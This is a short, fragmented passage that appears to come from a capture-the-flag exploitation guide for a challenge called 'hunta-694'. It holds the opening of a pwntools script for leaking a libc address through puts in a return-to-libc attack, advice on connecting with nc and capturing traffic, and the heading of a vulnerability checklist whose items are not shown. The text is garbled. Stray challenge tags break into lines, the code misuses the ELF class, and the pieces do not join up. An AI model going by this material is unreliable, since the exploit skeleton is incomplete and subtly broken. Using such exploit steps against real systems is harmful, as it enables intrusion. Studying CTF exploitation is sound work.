#!/usr/bin/env python3 from pwn import *
# ---- Step 1: Leak an address (example: puts@GLIBC) ----------------- offset = <offset_to_ret> puts_plt = ELF.plt['puts'] puts_got = ELF.got['puts'] main_addr = ELF.symbols['main'] hunta-694
$ nc <host> <port> or a local wrapper script ( run.sh ). Capture traffic with tcpdump / wireshark or socat . Below are the most common vulnerability patterns. Mark the ones that actually appear in hunta‑694 . hunta-694